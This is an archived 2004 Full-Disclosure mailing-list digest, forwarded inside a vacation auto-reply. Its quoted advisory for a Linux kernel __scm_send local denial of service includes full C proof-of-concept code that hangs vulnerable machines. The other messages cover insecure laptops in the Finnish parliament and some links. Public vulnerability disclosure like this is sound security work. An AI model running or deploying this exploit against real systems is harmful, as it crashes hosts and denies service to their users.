lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <s1c8aa34.054@PHX-DMZ-SMTP.CAROLLO.COM>
From: HDahlstrom at carollo.com (Harold Dahlstrom)
Subject: Re: Full-Disclosure Digest, Vol 1,
	Issue 2116 (Vacation Auto-Reply)

I am out of the office - please contact Doug Hesser, Samuel Nichols, or Manuel Milke for technical issues or Dennis Guarrera for administrative issues.

Thanks
--Harold

>>> full-disclosure 12/19/04 10:00 >>>

Send Full-Disclosure mailing list submissions to
	full-disclosure@...ts.netsys.com

To subscribe or unsubscribe via the World Wide Web, visit
	https://lists.netsys.com/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
	full-disclosure-request@...ts.netsys.com

You can reach the person managing the list at
	full-disclosure-owner@...ts.netsys.com

When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."


Today's Topics:

   1. Re: HyperTerminal - Buffer Overflow In .ht File (Gregory Gilliss)
   2. [VulnDiscuss] Re: Linux kernel scm_send local DoS
      (even multiplexed)
   3. E-mail tracking finds murderess and baby in	kidnap-homicide
      case. (Tamas Feher)
   4. Re: Security breach database (Willem Koenings)
   5. Insecurity in Finnish parlament (computers) (Markus Jansson)


----------------------------------------------------------------------

Message: 1
Date: Fri, 17 Dec 2004 10:38:23 -0800
From: Gregory Gilliss <ggilliss@...publishing.com>
Subject: Re: [Full-Disclosure] HyperTerminal - Buffer Overflow In .ht
	File
To: full-disclosure@...ts.netsys.com
Message-ID: <20041217183823.GA20342@...publishing.com>
Content-Type: text/plain; charset=us-ascii

great, so while I'm using hyperterminal on my network connected machine (!)
to update my hardware for the latest exploit, along comes someone with this
and hacks my client laptop. Somehow I'm glad that I only use UNIX...

-- Greg

On or about 2004.12.15 11:59:56 +0000, Brett Moore (brett.moore@...urity-assessment.com) said:

> ========================================================================
> = HyperTerminal - Buffer Overflow In .ht File
> =
> = MS Bulletin posted: 
> = http://www.microsoft.com/technet/security/bulletin/MS04-043.mspx
> =
> = Affected Software:
> =      Microsoft Windows NT Server 4.0 SP 6a 
> =      Microsoft Windows NT Server 4.0 Terminal Server Edition SP6
> =      Microsoft Windows 2000 SP4
> =      Microsoft Windows XP SP2 
> =      Microsoft Windows XP 64-Bit Edition SP1
> =      Microsoft Windows XP 64-Bit Edition Version 2003 
> =      Microsoft Windows Server 2003 
> =      Microsoft Windows Server 2003 64-Bit Edition
> =
> = Public disclosure on December 15, 2004
> ========================================================================
<<SNIP>>

-- 
Gregory A. Gilliss, CISSP                              E-mail: greg@...liss.com
Computer Security                             WWW: http://www.gilliss.com/greg/
PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3


------------------------------

Message: 2
Date: Wed, 15 Dec 2004 04:23:22 +0100
From: even multiplexed <Shadow333@....at>
Subject: [Full-Disclosure] [VulnDiscuss] Re: Linux kernel scm_send
	local DoS
To: security@...c.pl
Cc: vulnwatch@...nwatch.org, bugtraq@...urityfocus.com,
	full-disclosure@...ts.netsys.com
Message-ID: <41BFAE2A.7040002@....at>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Paul Starzetz wrote:

>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>
>Synopsis:  Linux kernel scm_send local DoS
>Product:   Linux kernel
>Version:   2.4 up to and including 2.4.28, 2.6 up to and including 2.6.9
>Vendor:    http://www.kernel.org/
>URL:       http://isec.pl/vulnerabilities/isec-0019-scm.txt
>CVE:       CAN-2004-1016
>Author:    Paul Starzetz <ihaquer@...c.pl>
>Date:      Dec 14, 2004
>
>
>Issue:
>======
>
>A  locally  exploitable  flaw  has been found in the Linux socket layer,
>that allows a local user to hang a vulnerable machine.
>
>
>Details:
>========
>
>The Linux kernel provides a powerful socket API  to  user  applications.
>Among other functions sockets provide an universal way for IPC and user-
>kernel communication. The socket layer uses several  logical  sublayers.
>One  of  the  layers,  so called auxiliary message layer (or scm layer),
>augments the socket API by  an  universal  user-kernel  message  passing
>capability (see recvfrom(2) for more details on auxiliary messages).
>
>One  of  the  scm  message  parsing  functions  invoked  from the kernel
>sendmsg() code is __scm_send() and suffers from a deadlock condition  if
>carefully  prepared  auxiliary  message(s)  is  sent  to  a socket by an
>unprivileged application.
>
>We believe that the 2.4 kernel branch is not  further  exploitable.  The
>2.6  branch  has not been extensively checked, however it may be locally
>exploitable to gain elevated privileges due to its increased complexity.
>
>
>Discussion:
>=============
>
>See attached code.
>
>
>Impact:
>=======
>
>Unprivileged local users may hang a vulnerable Linux machine.
>
>
>Credits:
>========
>
>Paul  Starzetz  <ihaquer@...c.pl>  has  identified the vulnerability and
>performed further research. COPYING, DISTRIBUTION, AND  MODIFICATION  OF
>INFORMATION  PRESENTED  HERE  IS ALLOWED ONLY WITH EXPRESS PERMISSION OF
>ONE OF THE AUTHORS.
>
>
>Disclaimer:
>===========
>
>This document and all the information it contains are provided "as  is",
>for  educational  purposes  only,  without warranty of any kind, whether
>express or implied.
>
>The authors reserve the right not to be responsible for the  topicality,
>correctness,  completeness  or  quality  of the information  provided in
>this document. Liability claims regarding damage caused by  the  use  of
>any  information  provided,  including  any kind of information which is
>incomplete or incorrect, will therefore be rejected.
>
>
>Appendix:
>=========
>
>/*
> *	Linux kernel 2.4 & 2.6 __scm_send DoS
> *	Warning! this code will hang your machine
> *
> *      gcc -O2 scmbang.c -o scmbang
> *
> *      Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
> *
> *      THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
> *      AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
> *      WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
> *
> */
>
>
>#define _GNU_SOURCE
>#include <stdio.h>
>#include <errno.h>
>#include <sys/socket.h>
>#include <arpa/inet.h>
>
>
>
>static char buf[1024];
>
>
>
>void
>fatal (const char *msg)
>{
>    printf ("\n");
>    if (!errno)
>      {
>	  fprintf (stderr, "FATAL: %s\n", msg);
>      }
>    else
>      {
>	  perror (msg);
>      }
>    printf ("\n");
>    fflush (stdout);
>    fflush (stderr);
>    exit (1);
>}
>
>
>int
>main (void)
>{
>    int s[2], r;
>    struct sockaddr_in sin;
>    struct msghdr *msg;
>    struct cmsghdr *cmsg;
>
>    r = socketpair (AF_UNIX, SOCK_DGRAM, 0, s);
>    if (r < 0)
>	fatal ("socketpair");
>
>    memset (buf, 0, sizeof (buf));
>    msg = (void *) buf;
>    msg->msg_control = (void *) (msg + 1);
>
>// make bad cmsgs
>    cmsg = (void *) msg->msg_control;
>
>    cmsg->cmsg_len = sizeof (*cmsg);
>    cmsg->cmsg_level = 0xdeadbebe;
>    cmsg->cmsg_type = 12;	// len after overflow on second msg
>    cmsg++;
>
>// -12 for deadlock
>    cmsg->cmsg_len = -12;
>    cmsg->cmsg_level = SOL_IP;
>    msg->msg_controllen = (unsigned) (cmsg + 1) - (unsigned) msg->msg_control;
>    r = sendmsg (s[0], msg, 0);
>    if (r < 0)
>	fatal ("sendmsg");
>
>    printf ("\nYou lucky\n");
>    fflush (stdout);
>
>    return 0;
>}
>
>- -- 
>Paul Starzetz
>iSEC Security Research
>http://isec.pl/
>
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.0.7 (GNU/Linux)
>
>iD8DBQFBvsFeC+8U3Z5wpu4RAkcYAJ9ZANZb3Yt8LHIZHu4YTiKN+Htt3QCfZ0rH
>ZB8QMKmLVyKaQ5fvN/l8mL8=
>=2hQr
>-----END PGP SIGNATURE-----
>
>
>
>  
>
Dear Ladies and Gentleman

First of all thanks to mir Starzetz for bringing this bug to our 
attention.i just wanted to ask if anyone has a tip for me how to 
quickfix this bug, without actually rebuilding a patched version of the 
kernel.
id be thankful for every tip.

i hope theres actually a way to do that, cause our customers wouldnt 
like that system of ours to reboot:/

greets
Oliver Leitner


------------------------------

Message: 3
Date: Sat, 18 Dec 2004 21:13:24 +0100
From: "Tamas Feher" <etomcat@...email.hu>
Subject: [Full-Disclosure] E-mail tracking finds murderess and baby in
	kidnap-homicide case.
To: full-disclosure@...ts.netsys.com
Message-ID: <41C49D74.29818.C2BE56@...alhost>
Content-Type: text/plain; charset=US-ASCII

Not for the faint of heart.

"http://www.cnn.com/2004/US/12/18/fetus.found.ali
ve/index.html"

BTW I love capital punishment!

Regards: Tamas Feher.


------------------------------

Message: 4
Date: Sun, 19 Dec 2004 00:04:06 +0200
From: Willem Koenings <infsec@...il.com>
Subject: Re: [Full-Disclosure] Security breach database
To: full-disclosure@...ts.netsys.com
Message-ID: <9b13f6c1041218140468012145@...l.gmail.com>
Content-Type: text/plain; charset=US-ASCII

> Looking for few interesting security breach stories...

Something to learn from :)

http://www.dataloss.net/papers/how.defaced.apache.org.txt

W.


------------------------------

Message: 5
Date: Sun, 19 Dec 2004 03:19:38 +0200
From: Markus Jansson <markus.jansson@...hmail.com>
Subject: [Full-Disclosure] Insecurity in Finnish parlament (computers)
To: full-disclosure@...ts.netsys.com
Message-ID: <41C4D72A.2010501@...hmail.com>
Content-Type: text/plain; charset=ISO-8859-15; format=flowed

Short version:
-------------

http://www.markusjansson.net/erecent.html#comments
"The laptop computers used by members of parlament and their assistants 
in here Finland have severe security holes. These laptop computers dont 
have firewalls, file encryption and wiping tools, automatic update is 
not turned on, operating system (WindowsXP) is on its default settings 
for most, computers only support 802.11b WLAN which is insecure, etc. 
etc. As a bonus, they use TeliaSonera GSM:s which are totally insecure 
because they use COMP-128-1 and A5/1 for security. I contacted them 
months ago but they havent bothered to answer me, nor to reporters I 
have contacted later. Oh dear..."



Long version:
-------------

1. The computers do not have firewall, not even ICF enabled. Users 
cannot even enable it themselfes, since they dont have administrative 
permissions on the computers. Any remote-exploit vulnerability or bad 
passphrase and BUM! The computers is hacked.

2. The computers are mainly on default settings. They are WindowsXP. Do 
I really need to say more about this issue and what happens from it?

3. The computers have support for Bluetooth and it is enabled by 
default. This leaves many attack vectors inplace that are pretty 
numerous for me to tell you. Also, they have firewire enabled, which 
means that as in iPod:s case, anyone with such device can walk to one of 
these laptops and download everything inside it. Ouch.

4. Laptops have WLAN, but it only supports the totally insecure 802.11b 
standard.

5. Computers do not have any kind of encryption programs. All files and 
folders are unencrypted. Even the EFS is turned off. There is no way to 
secure personal or sensitive documents in the computer.

6. There are no wiping tools in the computers to wipe off sensitive or 
personal files from them.

7. Computers do not have "Clear pagefile on shutdown" enabled, meaning 
that sensitive data can be recovered from unwashed swapfile later on.

8. Users do not have administrator permissions on computer so they could 
install neccessary security programs to them. Ofcourse, there is the 
plus side that this *should* limit the damage to the systems 
to...well..the user (= the member of parlament or their assistants). Ouch.

9. There are VPN connections in the computers, but it is unclear are 
they protected against man-in-the-middle-attacks or not. My educated 
guess is that they arent, meaning again...

10. Its unclear are the computers set on "automatic updates" or not. My 
educated guess is that they arent, meaning again (especially if you look 
at the point 1 again)...ouch.

11. Default browser is Internet Explorer, with default settings 
ofcourse. Now, I dont have to tell you how serious security risk this 
is, especially if you concider point 10...

12. MEP:s etc. use TeliaSonera GSM:s. The security that TeliaSonera uses 
is COMP-128-1 and A5/1, which are all totally insecure and can easily be 
broken with a laptop computer etc. meaning that their conversations can 
easily be eavesdropped. They should use COMP-128-3 and A5/3 to make it 
secure...

13. At TeliaSonera GSM networks, there is no protection against 
"false-basestation" techique, which easy bypass of crypto by simply 
turning it off from the "basestation". For example, Elisa uses 
COMP-128-3 and A5/3 and does not allow phones to turn off crypto even 
basestation orders them to do so.

I have contacted about this issue months ago to security personel in our 
parlament. They havent even bothered to answer me, not to mention that 
they would have fixed the computers security problems. So, here is it, 
maybe they'll listen now.



-- 
???My computer security & privacy related homepage
http://www.markusjansson.net
Use HushTools or GnuPG/PGP to encrypt any email
before sending it to me to protect our privacy.


------------------------------

_______________________________________________
Full-Disclosure mailing list
Full-Disclosure@...ts.netsys.com
https://lists.netsys.com/mailman/listinfo/full-disclosure


End of Full-Disclosure Digest, Vol 1, Issue 2116
************************************************



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ